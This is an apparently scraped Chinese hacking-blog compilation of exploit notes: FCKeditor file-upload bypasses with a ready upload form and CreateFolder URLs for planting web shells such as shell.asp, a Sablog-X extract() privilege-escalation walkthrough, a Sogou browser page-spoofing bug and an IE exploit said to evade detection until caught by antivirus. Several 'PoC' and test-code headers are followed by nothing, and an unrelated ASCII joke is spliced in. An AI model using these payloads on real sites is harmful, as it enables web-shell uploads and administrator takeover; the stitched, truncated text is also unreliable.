Author: 坏人咖啡

来源：woyigui

大牛的作品应该很不错

以下是功能介绍

1.全面支持HTTP类型

    * 支持HTTP 1.0/1.1；
    * 支持POST/GET /Cookie方法；
    * 支持Basic/NTLM /Digest验证；
    * 支持基于公钥或者私钥的 SSL；

2.全面的数据库类型识别  

    * 支持MS Access；
    * 支持MS SQL Server；
    * 支持Mysql Server；
    * 支持Oracle Server；
    * 支持Postgre SQL Server；
    * 支持 Informix SQL Server；
    * 支持Sybase …

测试代码：

这个代码利用起来比较麻烦需要诱导别人按F1键才可以

HLP文件 msgbox_test_help

貌似国内的XX操作系统里边都没有帮助文件！

查看编辑器版本
FCKeditor/_whatsnew.html
—————————————————————————————————————————————————————————————

2. Version 2.2 版本
Apache+linux 环境下在上传文件后面加个.突破！测试通过。
—————————————————————————————————————————————————————————————

3.Version <=2.4.2 For php 在处理PHP 上传的地方并未对Media 类型进行上传文件类型的控制，导致用户上传任意文件！将以下保存为html文件，修改action地址。
<form id=”frmUpload” enctype=”multipart/form-data”
action=”http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media” method=”post”>Upload a new file:<br>
<input type=”file” name=”NewFile” size=”50″><br>
<input id=”btnUpload” type=”submit” value=”Upload”>
</form>
—————————————————————————————————————————————————————————————

4.FCKeditor 文件上传“.”变“_”下划线的绕过方法
        很多时候上传的文件例如：shell.php.rar 或shell.php;.jpg 会变为shell_php;.jpg 这是新版FCK 的变化。
    4.1：提交shell.php+空格绕过
不过空格只支持win 系统 *nix 是不支持的[shell.php 和shell.php+空格是2 个不同的文件 未测试。
    4.2：继续上传同名文件可变为shell.php;(1).jpg 也可以新建一个文件夹，只检测了第一级的目录，如果跳到二级目录就不受限制。
—————————————————————————————————————————————————————————————

5. 突破建立文件夹
FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp
—————————————————————————————————————————————————————————————

6. …

作者：xisigr

测试版本：搜狗浏览器版本：1.4.0.418(正式版)

漏洞成因：在搜狗浏览器中，window.location和document.write两个函数发生条件竞争阻 塞。“window.location”函数使URL中显示到一个地址域，同时页面元素却可以被“document.write”函数所改写。这样导致攻 击者可以篡改页面，来实施钓鱼欺骗攻击。

效果图：

测试代码：

作者：Ryat

前不久80vul公布了sax2.0的一个漏洞,随后4ngel发布了补丁,不过权限验证部分的代码还是存在问题,下面就来简单说说这个漏洞:D

下面来看下这几个变量是怎么来的

由上面的代码可以看到,如果我们知道session表中uid为1的数据的sax_hash和onlineip,通过流程[2][3]就可以查询出正确的管理员信息,再通过extract($_EVO)注册变量,就可以通过后台的验证,获得管理员权限了:)
那么我们如何知道正确的sax_hash和onlineip呢？

replacesession()函数为我们提供帮助,因为$sax_hash、$sax_uid、$onlineip这些变量是可以控制的,所以我们可以向session表中出入一条uid为1的数据:)

首 先我们使$sax_uid为1,$sax_pw为空,这样就会跳过流程[1]执行流程[2],这时我们的sax_hash和onlineip在 session表中并不存在,所以流程[3]不会执行,通过extract($_EVO)注册变量时也不会重新注册$sax_uid、$sax_hash 和$onlineip,这样我们就可以通过updatesession()函数向session表中插入一条uid为1同时sax_hash和 onlineip也是我们知道的数据了
然后我们重新执行上面的过程,因为这时session表里已经有了我们需要的数据了,流程[3]将被执 行,user表中uid为1的管理员数据将被查询出并合并到$_EVO,并通过extract()重新注册变量[$sax_group的值将被重新注册为 1],这样我们就可以通过后台权限验证,并获得管理员权限了:)

PoC:

利用代码：

将上面的代码保存成ie.pl就可以了，现在我们来看一下代码中的说明部分

首先测试者用的是Vista的系统，测试对像用的是XP SP2 IE7

我们要在受害者的电脑上生成一个受信任的网站链接，这里你可以在IE-工具-Internet选项-安全-受信任站点中添加。

不用在本地运行，只要用IE打开有该漏洞代码的网页即可。

这里我再说明一下，这段代码保存后会被NOD32查杀

下面我们来看看攻击过程

这就是整个具体的攻击过程有兴趣的朋友可以试下：）

B (=8

B (==8

B (===8

B==8

B8

B==8

B (===8

B8

B==8

B (===8

B8

(B==8

B8

(B==8

B8

(B==8

**(==B8

…zzzZZZ

从马老大那转来的，自己看吧，发挥你的想像力！我想你能看明白的：）

作者：80vul-B

一 描叙：

由于Sablog-x v2.x的common.inc.php里$_EVO初始化处理存在逻辑漏洞，导致可以利用extract()来覆盖任意变量，最终导致xss、sql注射、代码执行等很多严重的安全漏洞。

二 分析

common.inc.php代码里：

由上面的代码片断可以看到,只要使$sax_hash和$sax_uid的布尔值为fales,$_EVO就不会被赋值,而$sax_hash和$sax_uid这两个变量来自由$_COOKIE,这样我们可以很容易的控制$_EVO了,然后通过extract()来覆盖任意变量,这将导致xss、sql inj、代码执行等很多严重的安全漏洞:)

三 利用

下面给个后台权限欺骗的PoC: